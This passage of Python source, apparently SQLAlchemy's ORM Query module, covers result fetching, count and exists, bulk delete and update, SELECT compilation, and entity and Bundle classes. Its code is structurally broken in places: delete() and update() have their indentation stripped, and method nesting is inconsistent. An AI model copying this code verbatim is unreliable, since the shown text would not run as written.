    (note this may consist of multiple result rows if join-loaded
    collections are present).

    Calling :meth:`.Query.first` causes the underlying query to be
    executed.

    .. seealso::

        :meth:`.Query.one`

        :meth:`.Query.one_or_none`

    """
    if self._statement is not None:
        # an explicit statement is in place; can't apply LIMIT, so
        # slice the materialized result instead.
        rows = list(self)[0:1]
    else:
        rows = list(self[0:1])
    return rows[0] if rows else None
def one_or_none(self):
    """Return at most one result or raise an exception.

    Returns ``None`` if the query selects no rows.  Raises
    ``sqlalchemy.orm.exc.MultipleResultsFound`` if multiple object
    identities are returned, or if multiple rows are returned for a
    query that returns only scalar values as opposed to full
    identity-mapped entities.

    Calling :meth:`.Query.one_or_none` causes the underlying query
    to be executed.

    .. versionadded:: 1.0.9

        Added :meth:`.Query.one_or_none`

    .. seealso::

        :meth:`.Query.first`

        :meth:`.Query.one`

    """
    rows = list(self)
    count = len(rows)
    if count == 0:
        return None
    if count == 1:
        return rows[0]
    raise orm_exc.MultipleResultsFound(
        "Multiple rows were found for one_or_none()")
def one(self):
    """Return exactly one result or raise an exception.

    Raises ``sqlalchemy.orm.exc.NoResultFound`` if the query selects
    no rows.  Raises ``sqlalchemy.orm.exc.MultipleResultsFound``
    if multiple object identities are returned, or if multiple
    rows are returned for a query that returns only scalar values
    as opposed to full identity-mapped entities.

    Calling :meth:`.one` causes the underlying query to be executed.

    .. seealso::

        :meth:`.Query.first`

        :meth:`.Query.one_or_none`

    """
    try:
        ret = self.one_or_none()
    except orm_exc.MultipleResultsFound:
        # re-raise with a message specific to one()
        raise orm_exc.MultipleResultsFound(
            "Multiple rows were found for one()")
    if ret is None:
        raise orm_exc.NoResultFound("No row was found for one()")
    return ret
def scalar(self):
    """Return the first element of the first result, or None if no
    rows are present.  If multiple rows are returned, raises
    MultipleResultsFound.

        >>> session.query(Item).scalar()
        <Item>
        >>> session.query(Item.id).scalar()
        1
        >>> session.query(Item.id).filter(Item.id < 0).scalar()
        None
        >>> session.query(Item.id, Item.name).scalar()
        1
        >>> session.query(func.count(Parent.id)).scalar()
        20

    This causes the underlying query to be executed.

    """
    try:
        row = self.one()
    except orm_exc.NoResultFound:
        return None
    if isinstance(row, tuple):
        return row[0]
    return row
def __iter__(self):
    # Compile the SELECT, autoflush pending changes (unless disabled
    # or rows are being refreshed in place), then execute and yield
    # ORM results.
    ctx = self._compile_context()
    ctx.statement.use_labels = True
    if self._autoflush and not self._populate_existing:
        self.session._autoflush()
    return self._execute_and_instances(ctx)
def __str__(self):
    # Render the SELECT as a string, compiling against the session's
    # bind when one can be located so dialect-specific SQL is shown.
    ctx = self._compile_context()
    bind = None
    if self.session:
        try:
            bind = self._get_bind_args(ctx, self.session.get_bind)
        except sa_exc.UnboundExecutionError:
            bind = None
    return str(ctx.statement.compile(bind))
def _connection_from_session(self, **kw):
    # Obtain a Connection from the Session, layering on any
    # per-query execution options.
    conn = self.session.connection(**kw)
    if not self._execution_options:
        return conn
    return conn.execution_options(**self._execution_options)
def _execute_and_instances(self, querycontext):
    # Resolve a connection via the bound mapper/clause, execute the
    # compiled statement, and hand the result rows to the ORM loading
    # machinery.
    conn = self._get_bind_args(
        querycontext,
        self._connection_from_session,
        close_with_result=True)

    rows = conn.execute(querycontext.statement, self._params)
    return loading.instances(querycontext.query, rows, querycontext)
def _get_bind_args(self, querycontext, fn, **kw):
    # Delegate to ``fn`` (e.g. Session.get_bind or
    # _connection_from_session) with the mapper and compiled clause
    # that describe this query.
    return fn(mapper=self._bind_mapper(),
              clause=querycontext.statement,
              **kw)
@property
def column_descriptions(self):
    """Return metadata about the columns which would be
    returned by this :class:`.Query`.

    Format is a list of dictionaries::

        user_alias = aliased(User, name='user2')
        q = sess.query(User, User.id, user_alias)

        # this expression:
        q.column_descriptions

        # would return:
        [
            {
                'name':'User',
                'type':User,
                'aliased':False,
                'expr':User,
                'entity': User
            },
            {
                'name':'id',
                'type':Integer(),
                'aliased':False,
                'expr':User.id,
                'entity': User
            },
            {
                'name':'user2',
                'type':User,
                'aliased':True,
                'expr':user_alias,
                'entity': user_alias
            }
        ]

    """
    # pair each query entity with its inspection (None when the
    # entity has no entity_zero), then describe each pair.
    return [
        {
            'name': ent._label_name,
            'type': ent.type,
            'aliased': getattr(insp_ent, 'is_aliased_class', False),
            'expr': ent.expr,
            'entity':
                getattr(insp_ent, "entity", None)
                if ent.entity_zero is not None
                and not insp_ent.is_clause_element
                else None
        }
        for ent, insp_ent in [
            (
                _ent,
                (inspect(_ent.entity_zero)
                 if _ent.entity_zero is not None else None)
            )
            for _ent in self._entities
        ]
    ]
def instances(self, cursor, __context=None):
    """Given a ResultProxy cursor as returned by connection.execute(),
    return an ORM result as an iterator.

    e.g.::

        result = engine.execute("select * from users")
        for u in session.query(User).instances(result):
            print u

    """
    # fall back to a fresh QueryContext when none was supplied
    context = __context if __context is not None else QueryContext(self)
    return loading.instances(self, cursor, context)
def merge_result(self, iterator, load=True):
    """Merge a result into this :class:`.Query` object's Session.

    Given an iterator returned by a :class:`.Query` of the same
    structure as this one, return an identical iterator of results
    with all mapped instances merged into the session using
    :meth:`.Session.merge`.  This is an optimized method which merges
    all mapped instances while preserving the structure of the result
    rows and unmapped columns, with less method overhead than calling
    :meth:`.Session.merge` explicitly for each value.

    The structure of the results is determined based on the column
    list of this :class:`.Query` - if these do not correspond,
    unchecked errors will occur.

    The 'load' argument is the same as that of :meth:`.Session.merge`.

    For an example of how :meth:`~.Query.merge_result` is used, see
    the source code for the example :ref:`examples_caching`, where
    :meth:`~.Query.merge_result` is used to efficiently restore state
    from a cache back into a target :class:`.Session`.

    """
    return loading.merge_result(self, iterator, load)
@property
def _select_args(self):
    # Keyword arguments describing this query's SELECT-level
    # modifiers, consumed when building the core select().
    return dict(
        limit=self._limit,
        offset=self._offset,
        distinct=self._distinct,
        prefixes=self._prefixes,
        suffixes=self._suffixes,
        group_by=self._group_by or None,
        having=self._having,
    )
@property
def _should_nest_selectable(self):
    # LIMIT/OFFSET or DISTINCT require this query to be wrapped in a
    # subquery when used as the source of another statement.
    opts = self._select_args
    return (opts.get('limit') is not None or
            opts.get('offset') is not None or
            opts.get('distinct', False))
def exists(self):
    """A convenience method that turns a query into an EXISTS subquery
    of the form EXISTS (SELECT 1 FROM ... WHERE ...).

    e.g.::

        q = session.query(User).filter(User.name == 'fred')
        session.query(q.exists())

    Producing SQL similar to::

        SELECT EXISTS (
            SELECT 1 FROM users WHERE users.name = :name_1
        ) AS anon_1

    The EXISTS construct is usually used in the WHERE clause::

        session.query(User.id).filter(q.exists()).scalar()

    Note that some databases such as SQL Server don't allow an
    EXISTS expression to be present in the columns clause of a
    SELECT.  To select a simple boolean value based on the exists
    as a WHERE, use :func:`.literal`::

        from sqlalchemy import literal

        session.query(literal(True)).filter(q.exists()).scalar()

    .. versionadded:: 0.8.1

    """
    # .add_columns() handles the case that we are a
    # query().select_from(X), so that ".statement" can be produced
    # (#2995), but also without omitting the FROM clause from a
    # query(X) (#2818); .with_only_columns() is applied after we have
    # a core select() so that we get just "SELECT 1" with no entities.
    inner = self.enable_eagerloads(False).add_columns('1').with_labels()
    stmt = inner.statement.with_only_columns([1])
    return sql.exists(stmt)
def count(self):
    r"""Return a count of rows this Query would return.

    This generates the SQL for this Query as follows::

        SELECT count(1) AS count_1 FROM (
            SELECT <rest of query follows...>
        ) AS anon_1

    .. versionchanged:: 0.7
        The above scheme is newly refined as of 0.7b3.

    For fine grained control over specific columns to count, to skip
    the usage of a subquery or otherwise control the FROM clause, or
    to use other aggregate functions, use
    :attr:`~sqlalchemy.sql.expression.func` expressions in conjunction
    with :meth:`~.Session.query`, i.e.::

        from sqlalchemy import func

        # count User records, without
        # using a subquery.
        session.query(func.count(User.id))

        # return count of user "id" grouped
        # by "name"
        session.query(func.count(User.id)).\
            group_by(User.name)

        from sqlalchemy import distinct

        # count distinct "name" values
        session.query(func.count(distinct(User.name)))

    """
    counter = sql.func.count(sql.literal_column('*'))
    return self.from_self(counter).scalar()
def delete(self, synchronize_session='evaluate'):
r"""Perform a bulk delete query.
Deletes rows matched by this query from the database.
E.g.::
sess.query(User).filter(User.age == 25).\
delete(synchronize_session=False)
sess.query(User).filter(User.age == 25).\
delete(synchronize_session='evaluate')
.. warning:: The :meth:`.Query.delete` method is a "bulk" operation,
which bypasses ORM unit-of-work automation in favor of greater
performance. **Please read all caveats and warnings below.**
:param synchronize_session: chooses the strategy for the removal of
matched objects from the session. Valid values are:
``False`` - don't synchronize the session. This option is the most
efficient and is reliable once the session is expired, which
typically occurs after a commit(), or explicitly using
expire_all(). Before the expiration, objects may still remain in
the session which were in fact deleted which can lead to confusing
results if they are accessed via get() or already loaded
collections.
``'fetch'`` - performs a select query before the delete to find
objects that are matched by the delete query and need to be
removed from the session. Matched objects are removed from the
session.
``'evaluate'`` - Evaluate the query's criteria in Python straight
on the objects in the session. If evaluation of the criteria isn't
implemented, an error is raised.
The expression evaluator currently doesn't account for differing
string collations between the database and Python.
:return: the count of rows matched as returned by the database's
"row count" feature.
.. warning:: **Additional Caveats for bulk query deletes**
* This method does **not work for joined
inheritance mappings**, since the **multiple table
deletes are not supported by SQL** as well as that the
**join condition of an inheritance mapper is not
automatically rendered**. Care must be taken in any
multiple-table delete to first accommodate via some other means
how the related table will be deleted, as well as to
explicitly include the joining
condition between those tables, even in mappings where
this is normally automatic. E.g. if a class ``Engineer``
subclasses ``Employee``, a DELETE against the ``Employee``
table would look like::
session.query(Engineer).\
filter(Engineer.id == Employee.id).\
filter(Employee.name == 'dilbert').\
delete()
However the above SQL will not delete from the Engineer table,
unless an ON DELETE CASCADE rule is established in the database
to handle it.
Short story, **do not use this method for joined inheritance
mappings unless you have taken the additional steps to make
this feasible**.
* The polymorphic identity WHERE criteria is **not** included
for single- or
joined- table updates - this must be added **manually** even
for single table inheritance.
* The method does **not** offer in-Python cascading of
relationships - it is assumed that ON DELETE CASCADE/SET
NULL/etc. is configured for any foreign key references
which require it, otherwise the database may emit an
integrity violation if foreign key references are being
enforced.
After the DELETE, dependent objects in the
:class:`.Session` which were impacted by an ON DELETE
may not contain the current state, or may have been
deleted. This issue is resolved once the
:class:`.Session` is expired, which normally occurs upon
:meth:`.Session.commit` or can be forced by using
:meth:`.Session.expire_all`. Accessing an expired
object whose row has been deleted will invoke a SELECT
to locate the row; when the row is not found, an
:class:`~sqlalchemy.orm.exc.ObjectDeletedError` is
raised.
* The ``'fetch'`` strategy results in an additional
SELECT statement emitted and will significantly reduce
performance.
* The ``'evaluate'`` strategy performs a scan of
all matching objects within the :class:`.Session`; if the
contents of the :class:`.Session` are expired, such as
via a proceeding :meth:`.Session.commit` call, **this will
result in SELECT queries emitted for every matching object**.
* The :meth:`.MapperEvents.before_delete` and
:meth:`.MapperEvents.after_delete`
events **are not invoked** from this method. Instead, the
:meth:`.SessionEvents.after_bulk_delete` method is provided to
act upon a mass DELETE of entity rows.
.. seealso::
:meth:`.Query.update`
:ref:`inserts_and_updates` - Core SQL tutorial
"""
delete_op = persistence.BulkDelete.factory(
self, synchronize_session)
delete_op.exec_()
return delete_op.rowcount
def update(self, values, synchronize_session='evaluate', update_args=None):
r"""Perform a bulk update query.
Updates rows matched by this query in the database.
E.g.::
sess.query(User).filter(User.age == 25).\
update({User.age: User.age - 10}, synchronize_session=False)
sess.query(User).filter(User.age == 25).\
update({"age": User.age - 10}, synchronize_session='evaluate')
.. warning:: The :meth:`.Query.update` method is a "bulk" operation,
which bypasses ORM unit-of-work automation in favor of greater
performance. **Please read all caveats and warnings below.**
:param values: a dictionary with attributes names, or alternatively
mapped attributes or SQL expressions, as keys, and literal
values or sql expressions as values. If :ref:`parameter-ordered
mode <updates_order_parameters>` is desired, the values can be
passed as a list of 2-tuples;
this requires that the :paramref:`~sqlalchemy.sql.expression.update.preserve_parameter_order`
flag is passed to the :paramref:`.Query.update.update_args` dictionary
as well.
.. versionchanged:: 1.0.0 - string names in the values dictionary
are now resolved against the mapped entity; previously, these
strings were passed as literal column names with no mapper-level
translation.
:param synchronize_session: chooses the strategy to update the
attributes on objects in the session. Valid values are:
``False`` - don't synchronize the session. This option is the most
efficient and is reliable once the session is expired, which
typically occurs after a commit(), or explicitly using
expire_all(). Before the expiration, updated objects may still
remain in the session with stale values on their attributes, which
can lead to confusing results.
``'fetch'`` - performs a select query before the update to find
objects that are matched by the update query. The updated
attributes are expired on matched objects.
``'evaluate'`` - Evaluate the Query's criteria in Python straight
on the objects in the session. If evaluation of the criteria isn't
implemented, an exception is raised.
The expression evaluator currently doesn't account for differing
string collations between the database and Python.
:param update_args: Optional dictionary, if present will be passed
to the underlying :func:`.update` construct as the ``**kw`` for
the object. May be used to pass dialect-specific arguments such
as ``mysql_limit``, as well as other special arguments such as
:paramref:`~sqlalchemy.sql.expression.update.preserve_parameter_order`.
.. versionadded:: 1.0.0
:return: the count of rows matched as returned by the database's
"row count" feature.
.. warning:: **Additional Caveats for bulk query updates**
* The method does **not** offer in-Python cascading of
relationships - it is assumed that ON UPDATE CASCADE is
configured for any foreign key references which require
it, otherwise the database may emit an integrity
violation if foreign key references are being enforced.
After the UPDATE, dependent objects in the
:class:`.Session` which were impacted by an ON UPDATE
CASCADE may not contain the current state; this issue is
resolved once the :class:`.Session` is expired, which
normally occurs upon :meth:`.Session.commit` or can be
forced by using :meth:`.Session.expire_all`.
* The ``'fetch'`` strategy results in an additional
SELECT statement emitted and will significantly reduce
performance.
* The ``'evaluate'`` strategy performs a scan of
all matching objects within the :class:`.Session`; if the
contents of the :class:`.Session` are expired, such as
via a proceeding :meth:`.Session.commit` call, **this will
result in SELECT queries emitted for every matching object**.
* The method supports multiple table updates, as detailed
in :ref:`multi_table_updates`, and this behavior does
extend to support updates of joined-inheritance and
other multiple table mappings. However, the **join
condition of an inheritance mapper is not
automatically rendered**. Care must be taken in any
multiple-table update to explicitly include the joining
condition between those tables, even in mappings where
this is normally automatic. E.g. if a class ``Engineer``
subclasses ``Employee``, an UPDATE of the ``Engineer``
local table using criteria against the ``Employee``
local table might look like::
session.query(Engineer).\
filter(Engineer.id == Employee.id).\
filter(Employee.name == 'dilbert').\
update({"engineer_type": "programmer"})
* The polymorphic identity WHERE criteria is **not** included
for single- or
joined- table updates - this must be added **manually**, even
for single table inheritance.
* The :meth:`.MapperEvents.before_update` and
:meth:`.MapperEvents.after_update`
events **are not invoked from this method**. Instead, the
:meth:`.SessionEvents.after_bulk_update` method is provided to
act upon a mass UPDATE of entity rows.
.. seealso::
:meth:`.Query.delete`
:ref:`inserts_and_updates` - Core SQL tutorial
"""
update_args = update_args or {}
update_op = persistence.BulkUpdate.factory(
self, synchronize_session, values, update_args)
update_op.exec_()
return update_op.rowcount
    def _compile_context(self, labels=True):
        """Assemble the :class:`.QueryContext` for this Query, producing
        the Core SELECT statement on ``context.statement``.

        :param labels: when True, apply labels to the rendered columns.
        """
        # before_compile event hooks may replace the Query wholesale.
        if self.dispatch.before_compile:
            for fn in self.dispatch.before_compile:
                new_query = fn(self)
                if new_query is not None:
                    self = new_query

        context = QueryContext(self)

        # a from_statement() query already carries its statement; no
        # compilation needed.
        if context.statement is not None:
            return context

        context.labels = labels

        context._for_update_arg = self._for_update_arg

        # each entity contributes its columns / FROMs to the context.
        for entity in self._entities:
            entity.setup_context(self, context)

        # deferred eager-join constructors recorded during setup.
        for rec in context.create_eager_joins:
            strategy = rec[0]
            strategy(*rec[1:])

        if context.from_clause:
            # "load from explicit FROMs" mode,
            # i.e. when select_from() or join() is used
            context.froms = list(context.from_clause)
        # else "load from discrete FROMs" mode,
        # i.e. when each _MappedEntity has its own FROM

        if self._enable_single_crit:
            self._adjust_for_single_inheritance(context)

        if not context.primary_columns:
            if self._only_load_props:
                raise sa_exc.InvalidRequestError(
                    "No column-based properties specified for "
                    "refresh operation. Use session.expire() "
                    "to reload collections and related items.")
            else:
                raise sa_exc.InvalidRequestError(
                    "Query contains no columns with which to "
                    "SELECT from.")

        # multi-row eager loads combined with LIMIT/OFFSET/DISTINCT
        # require wrapping the query in a subquery.
        if context.multi_row_eager_loaders and self._should_nest_selectable:
            context.statement = self._compound_eager_statement(context)
        else:
            context.statement = self._simple_statement(context)
        return context
    def _compound_eager_statement(self, context):
        """Render the SELECT when eager joins must be applied outside a
        wrapping subquery (LIMIT/OFFSET/DISTINCT present)."""
        # for eager joins present and LIMIT/OFFSET/DISTINCT,
        # wrap the query inside a select,
        # then append eager joins onto that

        if context.order_by:
            # ORDER BY columns must also appear in the inner columns
            # clause so the outer query can reference them.
            order_by_col_expr = \
                sql_util.expand_column_list_from_order_by(
                    context.primary_columns,
                    context.order_by
                )
        else:
            context.order_by = None
            order_by_col_expr = []

        inner = sql.select(
            context.primary_columns + order_by_col_expr,
            context.whereclause,
            from_obj=context.froms,
            use_labels=context.labels,
            # TODO: this order_by is only needed if
            # LIMIT/OFFSET is present in self._select_args,
            # else the application on the outside is enough
            order_by=context.order_by,
            **self._select_args
        )

        # put FOR UPDATE on the inner query, where MySQL will honor it,
        # as well as if it has an OF so Postgresql can use it.
        inner._for_update_arg = context._for_update_arg

        for hint in self._with_hints:
            inner = inner.with_hint(*hint)

        if self._correlate:
            inner = inner.correlate(*self._correlate)

        inner = inner.alias()

        # adapter translates references to the original columns into
        # references against the aliased subquery.
        equivs = self.__all_equivs()

        context.adapter = sql_util.ColumnAdapter(inner, equivs)

        statement = sql.select(
            [inner] + context.secondary_columns,
            use_labels=context.labels)

        # Oracle however does not allow FOR UPDATE on the subquery,
        # and the Oracle dialect ignores it, plus for Postgresql, MySQL
        # we expect that all elements of the row are locked, so also put it
        # on the outside (except in the case of PG when OF is used)
        if context._for_update_arg is not None and \
                context._for_update_arg.of is None:
            statement._for_update_arg = context._for_update_arg

        from_clause = inner
        for eager_join in context.eager_joins.values():
            # EagerLoader places a 'stop_on' attribute on the join,
            # giving us a marker as to where the "splice point" of
            # the join should be
            from_clause = sql_util.splice_joins(
                from_clause,
                eager_join, eager_join.stop_on)

        statement.append_from(from_clause)

        if context.order_by:
            # re-apply ORDER BY in terms of the aliased inner columns.
            statement.append_order_by(
                *context.adapter.copy_and_process(
                    context.order_by
                )
            )

        statement.append_order_by(*context.eager_order_by)
        return statement
    def _simple_statement(self, context):
        """Render the SELECT for the common case where no subquery
        wrapping is required."""
        if not context.order_by:
            context.order_by = None

        if self._distinct is True and context.order_by:
            # DISTINCT requires ORDER BY columns to appear in the
            # columns clause as well.
            context.primary_columns += \
                sql_util.expand_column_list_from_order_by(
                    context.primary_columns,
                    context.order_by
                )

        context.froms += tuple(context.eager_joins.values())

        statement = sql.select(
            context.primary_columns +
            context.secondary_columns,
            context.whereclause,
            from_obj=context.froms,
            use_labels=context.labels,
            order_by=context.order_by,
            **self._select_args
        )
        statement._for_update_arg = context._for_update_arg

        for hint in self._with_hints:
            statement = statement.with_hint(*hint)

        if self._correlate:
            statement = statement.correlate(*self._correlate)

        if context.eager_order_by:
            statement.append_order_by(*context.eager_order_by)
        return statement
    def _adjust_for_single_inheritance(self, context):
        """Apply single-table-inheritance filtering.

        For all distinct single-table-inheritance mappers represented in
        the columns clause of this query, as well as the "select from entity",
        add criterion to the WHERE
        clause of the given QueryContext such that only the appropriate
        subtypes are selected from the total results.

        """
        # candidate (entity, adapter) pairs come from the entities
        # present in the columns clause ...
        search = set(self._mapper_adapter_map.values())

        # ... plus the select_from() entity, if not already present.
        if self._select_from_entity and \
                self._select_from_entity not in self._mapper_adapter_map:
            insp = inspect(self._select_from_entity)
            if insp.is_aliased_class:
                adapter = insp._adapter
            else:
                adapter = None
            search = search.union([(self._select_from_entity, adapter)])

        for (ext_info, adapter) in search:
            # entities that were targets of join() already get their
            # criteria via the join itself.
            if ext_info in self._join_entities:
                continue
            single_crit = ext_info.mapper._single_table_criterion
            if single_crit is not None:
                if adapter:
                    single_crit = adapter.traverse(single_crit)
                single_crit = self._adapt_clause(single_crit, False, False)
                context.whereclause = sql.and_(
                    sql.True_._ifnone(context.whereclause),
                    single_crit)
from ..sql.selectable import ForUpdateArg
class LockmodeArg(ForUpdateArg):
    """Adapt the legacy ``Query.with_lockmode()`` string argument to the
    :class:`.ForUpdateArg` construct used by ``with_for_update()``."""

    @classmethod
    def parse_legacy_query(cls, mode):
        """Translate a legacy lockmode string into a :class:`.LockmodeArg`.

        :param mode: one of ``None`` / ``False`` (no locking),
         ``"read"`` (FOR SHARE), ``"update"`` (FOR UPDATE), or
         ``"update_nowait"`` (FOR UPDATE NOWAIT).
        :return: a new instance, or ``None`` when no lock mode
         was requested.
        :raise sa_exc.ArgumentError: if ``mode`` is unrecognized.
        """
        if mode in (None, False):
            return None

        if mode == "read":
            read = True
            nowait = False
        elif mode == "update":
            read = nowait = False
        elif mode == "update_nowait":
            nowait = True
            read = False
        else:
            raise sa_exc.ArgumentError(
                "Unknown with_lockmode argument: %r" % mode)

        # classmethod first parameter is conventionally named ``cls``;
        # constructing via ``cls`` (not the hard-coded class name) lets
        # subclasses produce instances of their own type.
        return cls(read=read, nowait=nowait)
class _QueryEntity(object):
    """represent an entity column returned within a Query result."""

    def __new__(cls, *args, **kwargs):
        # Factory dispatch: instantiating _QueryEntity(query, entity)
        # yields the concrete subclass matching the entity argument -
        # mapped class -> _MapperEntity, Bundle -> _BundleEntity,
        # anything else (column/expression/string) -> _ColumnEntity.
        if cls is _QueryEntity:
            entity = args[1]  # args[0] is the owning Query
            if not isinstance(entity, util.string_types) and \
                    _is_mapped_class(entity):
                cls = _MapperEntity
            elif isinstance(entity, Bundle):
                cls = _BundleEntity
            else:
                cls = _ColumnEntity
        return object.__new__(cls)

    def _clone(self):
        # shallow copy: new instance sharing a copy of this one's state,
        # without re-running __init__ (which mutates the owning Query).
        q = self.__class__.__new__(self.__class__)
        q.__dict__ = self.__dict__.copy()
        return q
class _MapperEntity(_QueryEntity):
    """mapper/class/AliasedClass entity"""

    def __init__(self, query, entity):
        # first mapper entity added becomes the query's primary entity.
        if not query._primary_entity:
            query._primary_entity = self
        query._entities.append(self)
        query._has_mapper_entities = True
        self.entities = [entity]
        self.expr = entity

    supports_single_entity = True

    use_id_for_hash = True

    def setup_entity(self, ext_info, aliased_adapter):
        """Receive the inspected form of the entity plus an adapter for
        aliased entities; record mapper/selectable/polymorphic state."""
        self.mapper = ext_info.mapper
        self.aliased_adapter = aliased_adapter
        self.selectable = ext_info.selectable
        self.is_aliased_class = ext_info.is_aliased_class
        self._with_polymorphic = ext_info.with_polymorphic_mappers
        self._polymorphic_discriminator = \
            ext_info.polymorphic_on
        self.entity_zero = ext_info
        if ext_info.is_aliased_class:
            self._label_name = self.entity_zero.name
        else:
            self._label_name = self.mapper.class_.__name__
        self.path = self.entity_zero._path_registry

    def set_with_polymorphic(self, query, cls_or_mappers,
                             selectable, polymorphic_on):
        """Receive an update from a call to query.with_polymorphic().

        Note the newer style of using a free standing with_polymporphic()
        construct doesn't make use of this method.

        """
        if self.is_aliased_class:
            # TODO: invalidrequest ?
            raise NotImplementedError(
                "Can't use with_polymorphic() against "
                "an Aliased object"
            )

        if cls_or_mappers is None:
            # reset to non-polymorphic loading.
            query._reset_polymorphic_adapter(self.mapper)
            return

        mappers, from_obj = self.mapper._with_polymorphic_args(
            cls_or_mappers, selectable)
        self._with_polymorphic = mappers
        self._polymorphic_discriminator = polymorphic_on

        self.selectable = from_obj
        query._mapper_loads_polymorphically_with(
            self.mapper, sql_util.ColumnAdapter(
                from_obj, self.mapper._equivalent_columns))

    @property
    def type(self):
        # the mapped class represented by this entity.
        return self.mapper.class_

    @property
    def entity_zero_or_selectable(self):
        return self.entity_zero

    def corresponds_to(self, entity):
        return _entity_corresponds_to(self.entity_zero, entity)

    def adapt_to_selectable(self, query, sel):
        query._entities.append(self)

    def _get_entity_clauses(self, query, context):
        """Return the column adapter in effect for this entity, or None."""
        adapter = None

        if not self.is_aliased_class:
            if query._polymorphic_adapters:
                adapter = query._polymorphic_adapters.get(self.mapper, None)
        else:
            adapter = self.aliased_adapter

        if adapter:
            if query._from_obj_alias:
                # combine with the from_self() / select_entity_from()
                # alias adapter, applied first.
                ret = adapter.wrap(query._from_obj_alias)
            else:
                ret = adapter
        else:
            ret = query._from_obj_alias

        return ret

    def row_processor(self, query, context, result):
        """Produce the (callable, label) pair that converts raw result
        rows into instances of the mapped class."""
        adapter = self._get_entity_clauses(query, context)

        if context.adapter and adapter:
            adapter = adapter.wrap(context.adapter)
        elif not adapter:
            adapter = context.adapter

        # polymorphic mappers which have concrete tables in
        # their hierarchy usually
        # require row aliasing unconditionally.
        if not adapter and self.mapper._requires_row_aliasing:
            adapter = sql_util.ColumnAdapter(
                self.selectable,
                self.mapper._equivalent_columns)

        if query._primary_entity is self:
            only_load_props = query._only_load_props
            refresh_state = context.refresh_state
        else:
            only_load_props = refresh_state = None

        _instance = loading._instance_processor(
            self.mapper,
            context,
            result,
            self.path,
            adapter,
            only_load_props=only_load_props,
            refresh_state=refresh_state,
            polymorphic_discriminator=self._polymorphic_discriminator
        )

        return _instance, self._label_name

    def setup_context(self, query, context):
        """Contribute this entity's FROM, ORDER BY and columns to the
        compilation context."""
        adapter = self._get_entity_clauses(query, context)

        # if self._adapted_selectable is None:
        context.froms += (self.selectable,)

        # mapper-level order_by applies only when the query specified
        # none of its own (order_by is False, the unset marker).
        if context.order_by is False and self.mapper.order_by:
            context.order_by = self.mapper.order_by

            # apply adaptation to the mapper's order_by if needed.
            if adapter:
                context.order_by = adapter.adapt_list(
                    util.to_list(
                        context.order_by
                    )
                )

        loading._setup_entity_query(
            context, self.mapper, self,
            self.path, adapter, context.primary_columns,
            with_polymorphic=self._with_polymorphic,
            only_load_props=query._only_load_props,
            polymorphic_discriminator=self._polymorphic_discriminator
        )

    def __str__(self):
        return str(self.mapper)
@inspection._self_inspects
class Bundle(InspectionAttr):
    """A grouping of SQL expressions that are returned by a :class:`.Query`
    under one namespace.

    The :class:`.Bundle` essentially allows nesting of the tuple-based
    results returned by a column-oriented :class:`.Query` object.  It also
    is extensible via simple subclassing, where the primary capability
    to override is that of how the set of expressions should be returned,
    allowing post-processing as well as custom return types, without
    involving ORM identity-mapped classes.

    .. versionadded:: 0.9.0

    .. seealso::

        :ref:`bundles`

    """

    single_entity = False
    """If True, queries for a single Bundle will be returned as a single
    entity, rather than an element within a keyed tuple."""

    # InspectionAttr flags: a Bundle is none of these inspection targets.
    is_clause_element = False

    is_mapper = False

    is_aliased_class = False

    def __init__(self, name, *exprs, **kw):
        r"""Construct a new :class:`.Bundle`.

        e.g.::

            bn = Bundle("mybundle", MyClass.x, MyClass.y)

            for row in session.query(bn).filter(
                    bn.c.x == 5).filter(bn.c.y == 4):
                print(row.mybundle.x, row.mybundle.y)

        :param name: name of the bundle.
        :param \*exprs: columns or SQL expressions comprising the bundle.
        :param single_entity=False: if True, rows for this :class:`.Bundle`
         can be returned as a "single entity" outside of any enclosing tuple
         in the same manner as a mapped entity.

        """
        self.name = self._label = name
        self.exprs = exprs
        # per-instance column namespace, shadowing the class-level
        # ``columns = None`` placeholder below.
        self.c = self.columns = ColumnCollection()
        self.columns.update((getattr(col, "key", col._label), col)
                            for col in exprs)
        self.single_entity = kw.pop('single_entity', self.single_entity)

    columns = None
    """A namespace of SQL expressions referred to by this :class:`.Bundle`.

        e.g.::

            bn = Bundle("mybundle", MyClass.x, MyClass.y)

            q = sess.query(bn).filter(bn.c.x == 5)

        Nesting of bundles is also supported::

            b1 = Bundle("b1",
                    Bundle('b2', MyClass.a, MyClass.b),
                    Bundle('b3', MyClass.x, MyClass.y)
                )

            q = sess.query(b1).filter(
                b1.c.b2.c.a == 5).filter(b1.c.b3.c.y == 9)

    .. seealso::

        :attr:`.Bundle.c`

    """

    c = None
    """An alias for :attr:`.Bundle.columns`."""

    def _clone(self):
        # shallow copy without invoking __init__.
        cloned = self.__class__.__new__(self.__class__)
        cloned.__dict__.update(self.__dict__)
        return cloned

    def __clause_element__(self):
        # render as a (non-parenthesized) list of the member expressions.
        return expression.ClauseList(group=False, *self.exprs)

    @property
    def clauses(self):
        return self.__clause_element__().clauses

    def label(self, name):
        """Provide a copy of this :class:`.Bundle` passing a new label."""
        cloned = self._clone()
        cloned.name = name
        return cloned

    def create_row_processor(self, query, procs, labels):
        """Produce the "row processing" function for this :class:`.Bundle`.

        May be overridden by subclasses.

        .. seealso::

            :ref:`bundles` - includes an example of subclassing.

        """
        keyed_tuple = util.lightweight_named_tuple('result', labels)

        def proc(row):
            # apply each member's processor to the row and pack into a
            # named tuple (the comprehension's ``proc`` shadows only
            # within the comprehension scope).
            return keyed_tuple([proc(row) for proc in procs])
        return proc
class _BundleEntity(_QueryEntity):
    """Query entity wrapping a :class:`.Bundle` of expressions."""

    use_id_for_hash = False

    def __init__(self, query, bundle, setup_entities=True):
        # NOTE: ``query`` may be an enclosing _BundleEntity for nested
        # bundles - only the ``_entities`` list attribute is relied upon.
        query._entities.append(self)
        self.bundle = self.expr = bundle
        self.type = type(bundle)
        self._label_name = bundle.name
        self._entities = []

        if setup_entities:
            for expr in bundle.exprs:
                if isinstance(expr, Bundle):
                    # recurse: nested bundle appends itself to *our*
                    # _entities list.
                    _BundleEntity(self, expr)
                else:
                    _ColumnEntity(self, expr, namespace=self)

        self.supports_single_entity = self.bundle.single_entity

    @property
    def mapper(self):
        return self.entity_zero.mapper

    @property
    def entities(self):
        # flattened entities of all members.
        entities = []
        for ent in self._entities:
            entities.extend(ent.entities)
        return entities

    @property
    def entity_zero(self):
        # first member with a non-None entity_zero, else None.
        for ent in self._entities:
            ezero = ent.entity_zero
            if ezero is not None:
                return ezero
        else:
            return None

    def corresponds_to(self, entity):
        # TODO: this seems to have no effect for
        # _ColumnEntity either
        return False

    @property
    def entity_zero_or_selectable(self):
        for ent in self._entities:
